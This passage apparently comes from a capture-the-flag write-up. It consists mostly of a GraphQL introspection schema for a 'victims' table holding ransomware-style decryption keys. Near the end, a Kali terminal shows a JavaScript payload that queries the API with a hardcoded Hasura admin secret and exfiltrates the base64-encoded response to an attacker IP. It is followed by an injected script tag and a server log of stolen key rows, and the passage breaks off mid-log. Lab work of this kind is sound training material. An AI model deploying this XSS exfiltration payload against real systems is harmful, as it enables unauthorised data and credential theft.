values"},{"name":"where","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null}},"description":"filter the rows which have to be updated"}],"isDeprecated":false,"deprecationReason":null,"name":"update_victims","type":{"kind":"OBJECT","name":"victims_mutation_response","ofType":null},"description":"update data of the table: \"victims\""}]},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"order_by","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"asc","description":"in the ascending order, nulls last"},{"isDeprecated":false,"deprecationReason":null,"name":"asc_nulls_first","description":"in the ascending order, nulls first"},{"isDeprecated":false,"deprecationReason":null,"name":"asc_nulls_last","description":"in the ascending order, nulls last"},{"isDeprecated":false,"deprecationReason":null,"name":"desc","description":"in the descending order, nulls first"},{"isDeprecated":false,"deprecationReason":null,"name":"desc_nulls_first","description":"in the descending order, nulls first"},{"isDeprecated":false,"deprecationReason":null,"name":"desc_nulls_last","description":"in the descending order, nulls last"}],"description":"column ordering options","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"query_root","enumValues":null,"description":"query root","fields":[{"args":[{"name":"distinct_on","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_select_column","ofType":null}}},"description":"distinct select on columns"},{"name":"limit","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"limit the nuber of rows returned"},{"name":"offset","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"skip the first n rows. Use only with order_by"},{"name":"order_by","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_order_by","ofType":null}}},"description":"sort the rows by one or more columns"},{"name":"where","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null},"description":"filter the rows returned"}],"isDeprecated":false,"deprecationReason":null,"name":"victims","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims","ofType":null}}}},"description":"fetch data from the table: \"victims\""},{"args":[{"name":"distinct_on","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_select_column","ofType":null}}},"description":"distinct select on columns"},{"name":"limit","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"limit the nuber of rows returned"},{"name":"offset","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"skip the first n rows. Use only with order_by"},{"name":"order_by","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_order_by","ofType":null}}},"description":"sort the rows by one or more columns"},{"name":"where","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null},"description":"filter the rows returned"}],"isDeprecated":false,"deprecationReason":null,"name":"victims_aggregate","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims_aggregate","ofType":null}},"description":"fetch aggregated fields from the table: \"victims\""},{"args":[{"name":"id","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"description":null}],"isDeprecated":false,"deprecationReason":null,"name":"victims_by_pk","type":{"kind":"OBJECT","name":"victims","ofType":null},"description":"fetch data from the table: \"victims\" using primary key columns"}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"subscription_root","enumValues":null,"description":"subscription root","fields":[{"args":[{"name":"distinct_on","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_select_column","ofType":null}}},"description":"distinct select on columns"},{"name":"limit","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"limit the nuber of rows returned"},{"name":"offset","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"skip the first n rows. Use only with order_by"},{"name":"order_by","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_order_by","ofType":null}}},"description":"sort the rows by one or more columns"},{"name":"where","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null},"description":"filter the rows returned"}],"isDeprecated":false,"deprecationReason":null,"name":"victims","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims","ofType":null}}}},"description":"fetch data from the table: \"victims\""},{"args":[{"name":"distinct_on","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_select_column","ofType":null}}},"description":"distinct select on columns"},{"name":"limit","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"limit the nuber of rows returned"},{"name":"offset","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":"skip the first n rows. Use only with order_by"},{"name":"order_by","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_order_by","ofType":null}}},"description":"sort the rows by one or more columns"},{"name":"where","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null},"description":"filter the rows returned"}],"isDeprecated":false,"deprecationReason":null,"name":"victims_aggregate","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims_aggregate","ofType":null}},"description":"fetch aggregated fields from the table: \"victims\""},{"args":[{"name":"id","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"description":null}],"isDeprecated":false,"deprecationReason":null,"name":"victims_by_pk","type":{"kind":"OBJECT","name":"victims","ofType":null},"description":"fetch data from the table: \"victims\" using primary key columns"}]},{"inputFields":null,"kind":"SCALAR","possibleTypes":null,"interfaces":null,"name":"timestamp","enumValues":null,"description":null,"fields":null},{"inputFields":[{"name":"_eq","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_gt","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_gte","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_in","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"timestamp","ofType":null}}},"description":null},{"name":"_is_null","defaultValue":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null},{"name":"_lt","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_lte","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_neq","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null},{"name":"_nin","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"timestamp","ofType":null}}},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"timestamp_comparison_exp","enumValues":null,"description":"expression to compare columns of type timestamp. All fields are combined with logical 'AND'.","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims","enumValues":null,"description":"columns and relationships of \"victims\"","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"filename","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"key","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"timer","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"timestamp","ofType":null}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_aggregate","enumValues":null,"description":"aggregated selection of \"victims\"","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"aggregate","type":{"kind":"OBJECT","name":"victims_aggregate_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"nodes","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims","ofType":null}}}},"description":null}]},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_aggregate_fields","enumValues":null,"description":"aggregate fields of \"victims\"","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"avg","type":{"kind":"OBJECT","name":"victims_avg_fields","ofType":null},"description":null},{"args":[{"name":"columns","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_select_column","ofType":null}}},"description":null},{"name":"distinct","defaultValue":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"description":null}],"isDeprecated":false,"deprecationReason":null,"name":"count","type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"max","type":{"kind":"OBJECT","name":"victims_max_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"min","type":{"kind":"OBJECT","name":"victims_min_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"stddev","type":{"kind":"OBJECT","name":"victims_stddev_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"stddev_pop","type":{"kind":"OBJECT","name":"victims_stddev_pop_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"stddev_samp","type":{"kind":"OBJECT","name":"victims_stddev_samp_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"sum","type":{"kind":"OBJECT","name":"victims_sum_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"var_pop","type":{"kind":"OBJECT","name":"victims_var_pop_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"var_samp","type":{"kind":"OBJECT","name":"victims_var_samp_fields","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"variance","type":{"kind":"OBJECT","name":"victims_variance_fields","ofType":null},"description":null}]},{"inputFields":[{"name":"avg","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_avg_order_by","ofType":null},"description":null},{"name":"count","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"max","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_max_order_by","ofType":null},"description":null},{"name":"min","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_min_order_by","ofType":null},"description":null},{"name":"stddev","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_stddev_order_by","ofType":null},"description":null},{"name":"stddev_pop","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_stddev_pop_order_by","ofType":null},"description":null},{"name":"stddev_samp","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_stddev_samp_order_by","ofType":null},"description":null},{"name":"sum","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_sum_order_by","ofType":null},"description":null},{"name":"var_pop","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_var_pop_order_by","ofType":null},"description":null},{"name":"var_samp","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_var_samp_order_by","ofType":null},"description":null},{"name":"variance","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_variance_order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_aggregate_order_by","enumValues":null,"description":"order by aggregate values of table \"victims\"","fields":null},{"inputFields":[{"name":"data","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_insert_input","ofType":null}}}},"description":null},{"name":"on_conflict","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_on_conflict","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_arr_rel_insert_input","enumValues":null,"description":"input type for inserting array relation for remote table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_avg_fields","enumValues":null,"description":"aggregate avg on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_avg_order_by","enumValues":null,"description":"order by avg() on columns of table \"victims\"","fields":null},{"inputFields":[{"name":"_and","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null}},"description":null},{"name":"_not","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null},"description":null},{"name":"_or","defaultValue":null,"type":{"kind":"LIST","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_bool_exp","ofType":null}},"description":null},{"name":"filename","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"String_comparison_exp","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"Int_comparison_exp","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"String_comparison_exp","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"String_comparison_exp","ofType":null},"description":null},{"name":"timer","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"timestamp_comparison_exp","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_bool_exp","enumValues":null,"description":"Boolean expression to filter rows from the table \"victims\". All fields are combined with a logical 'AND'.","fields":null},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"victims_constraint","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"victims_pkey","description":"unique or primary key constraint"}],"description":"unique or primary key constraints on table \"victims\"","fields":null},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_inc_input","enumValues":null,"description":"input type for incrementing integer columne in table \"victims\"","fields":null},{"inputFields":[{"name":"filename","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"timer","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_insert_input","enumValues":null,"description":"input type for inserting data into table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_max_fields","enumValues":null,"description":"aggregate max on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"filename","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"key","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null}]},{"inputFields":[{"name":"filename","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_max_order_by","enumValues":null,"description":"order by max() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_min_fields","enumValues":null,"description":"aggregate min on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"filename","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"key","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"name","type":{"kind":"SCALAR","name":"String","ofType":null},"description":null}]},{"inputFields":[{"name":"filename","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_min_order_by","enumValues":null,"description":"order by min() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_mutation_response","enumValues":null,"description":"response of any mutation on the table \"victims\"","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"affected_rows","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Int","ofType":null}},"description":"number of affected rows by the mutation"},{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"returning","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"victims","ofType":null}}}},"description":"data of the affected rows by the mutation"}]},{"inputFields":[{"name":"data","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"INPUT_OBJECT","name":"victims_insert_input","ofType":null}},"description":null},{"name":"on_conflict","defaultValue":null,"type":{"kind":"INPUT_OBJECT","name":"victims_on_conflict","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_obj_rel_insert_input","enumValues":null,"description":"input type for inserting object relation for remote table \"victims\"","fields":null},{"inputFields":[{"name":"constraint","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_constraint","ofType":null}},"description":null},{"name":"update_columns","defaultValue":null,"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"victims_update_column","ofType":null}}}},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_on_conflict","enumValues":null,"description":"on conflict condition type for table \"victims\"","fields":null},{"inputFields":[{"name":"filename","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null},{"name":"timer","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_order_by","enumValues":null,"description":"ordering options when selecting data from \"victims\"","fields":null},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"victims_select_column","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"filename","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"id","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"key","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"name","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"timer","description":"column name"}],"description":"select columns of table \"victims\"","fields":null},{"inputFields":[{"name":"filename","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"id","defaultValue":null,"type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null},{"name":"key","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"name","defaultValue":null,"type":{"kind":"SCALAR","name":"String","ofType":null},"description":null},{"name":"timer","defaultValue":null,"type":{"kind":"SCALAR","name":"timestamp","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_set_input","enumValues":null,"description":"input type for updating data in table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_stddev_fields","enumValues":null,"description":"aggregate stddev on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_stddev_order_by","enumValues":null,"description":"order by stddev() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_stddev_pop_fields","enumValues":null,"description":"aggregate stddev_pop on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_stddev_pop_order_by","enumValues":null,"description":"order by stddev_pop() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_stddev_samp_fields","enumValues":null,"description":"aggregate stddev_samp on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_stddev_samp_order_by","enumValues":null,"description":"order by stddev_samp() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_sum_fields","enumValues":null,"description":"aggregate sum on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Int","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_sum_order_by","enumValues":null,"description":"order by sum() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"ENUM","possibleTypes":null,"interfaces":null,"name":"victims_update_column","enumValues":[{"isDeprecated":false,"deprecationReason":null,"name":"filename","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"id","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"key","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"name","description":"column name"},{"isDeprecated":false,"deprecationReason":null,"name":"timer","description":"column name"}],"description":"update columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_var_pop_fields","enumValues":null,"description":"aggregate var_pop on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_var_pop_order_by","enumValues":null,"description":"order by var_pop() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_var_samp_fields","enumValues":null,"description":"aggregate var_samp on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_var_samp_order_by","enumValues":null,"description":"order by var_samp() on columns of table \"victims\"","fields":null},{"inputFields":null,"kind":"OBJECT","possibleTypes":null,"interfaces":[],"name":"victims_variance_fields","enumValues":null,"description":"aggregate variance on columns","fields":[{"args":[],"isDeprecated":false,"deprecationReason":null,"name":"id","type":{"kind":"SCALAR","name":"Float","ofType":null},"description":null}]},{"inputFields":[{"name":"id","defaultValue":null,"type":{"kind":"ENUM","name":"order_by","ofType":null},"description":null}],"kind":"INPUT_OBJECT","possibleTypes":null,"interfaces":null,"name":"victims_variance_order_by","enumValues":null,"description":"order by variance() on columns of table \"victims\"","fields":null}],"mutationType":{"name":"mutation_root"}}}}

columns and relationships of "victims"

fields

filenameString

idInt!

keyString!  here to decrypt

nameString!

timertimestamp!


┌──(witty㉿kali)-[~/Downloads]
└─$ cat graph_ql_key.js 
var xhr = new XMLHttpRequest();
var q = '{"query":"{\n victims {\n filename\n id\nkey\n name\n timer\n }\n}"}';
// xhr.setRequestHeader('Content-Type', 'application/json');
xhr.open("POST", "http://192.168.150.10:8080/v1/graphql/", true);
xhr.setRequestHeader('x-hasura-admin-secret','s3cr3754uc35432');

xhr.onreadystatechange=function() {
    if (this.readyState === 4) {
        var r = new XMLHttpRequest();
        r.open('GET','http://10.8.19.103:1234/?data='+btoa(this.responseText),false);
        r.send();
    }
}

xhr.send(q);

<script src='http://10.8.19.103:1234/graph_ql_key.js'></script>

10.10.77.135 - - [11/Jul/2023 15:35:16] "GET /?data=


{"data":{"victims":[{"filename":"miredo.conf","id":69,"key":"RW1Ed3ZNV09aeWFjOTdxM1B0OFQzTkNFY0JDbDNKenA1a1FfVFBfWXZ6ZVN5MnAuTkpJV1NUanRsZ0lWQVZWUg==","name":"192.168.66.12","timer":"2020-04-15T20:56:13.203303"}, {"filename":"fuse.conf","id":71,"key":"OHphWi50Umt5SEVBNGhYemlxM3hzOFZCWTN3YzFjWFVVMkQ2Z3d0NEcxRFJ6cGJWbGZYY3FSMUpLREpEYXRrdw==","name":"192.168.66.200","timer":"2020-04-15T20:57:00.398945"}, {"filename":"Photos.zip","id":49,"key":"22iAgaC6Z8BT4+YhiCBWuOLXWuc+JKmKf6XZynuCfTKD7kXuz9/mHeDE8Vvlk4Dtu0kSMHxnQ3VaUD72GzG4UA==","name":"77.154.250.54","timer":"2020-03-19T11:29:48.523753"}, {"filename":"Transfers.csv","id":42,"key":"w68C7PrR4HkCLWYpbH5tUPh4Uh3og91QUtzWD2SmnJeNGIDZZ7Lbesp6Aa9cx36vqsICnfCYT0H6Ff6SmOaI6Q==","name":"192.168.66.134","timer":"2019-04-09T10:50:37.585655"}, {"filename":"BTC-Wallet.tar","id":50,"key":"1AcXybheh5579DlQmcQq4Awlv1Qs6uZXzM+ke3po6zgz6C294iT6YJgMz9n7myd2Vf6KxS+yuZziPcICLXe75g==","name":"45.35.25.4","timer":"2020-04-12T14:30:18.766926"}, {"filename":"archive.zip","id":43,"key":"MtwC53PsMaD0TkRyCr/vYhBxEHqXict7MUoYUSux9J036ifSgXtqPdVmAIdqm7EEcov6cjicqhOom2woKKkUdQ==","name":"26.34.132.1","timer":"2019-01-11T10:50:37.617187"}, {"filename":"Books.xls","id":45,"key":"pukeL2llboQLPKlG71yEGUFiV1bmXBv6fadrhIjyDRM6bZjrFYXtFP8uN13hDq6iEDoneH8W//XIHw4/L/nc6Q==","name":"192.168.150.1","timer":"2020-04-14T10:56:35.669927"}, {"filename":"Database.kbxd","id":48,"key":"F+lRG6As2e1qBd3/7dPTvcmcluUEjMwkq22K6zBIcP8ZF1LuJLsarUKgmhw+P8oZvBSJUXGiGVcRuHxbnQY8Tg==","name":"195.204.178.84","timer":"2020-04-15T14:29:24.383136"}, 